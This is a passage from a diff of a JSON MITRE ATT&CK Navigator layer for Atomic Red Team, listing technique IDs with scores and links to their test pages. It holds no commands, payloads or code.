96.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techn
iqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546
.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comm
ent":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atom
ic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1
021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":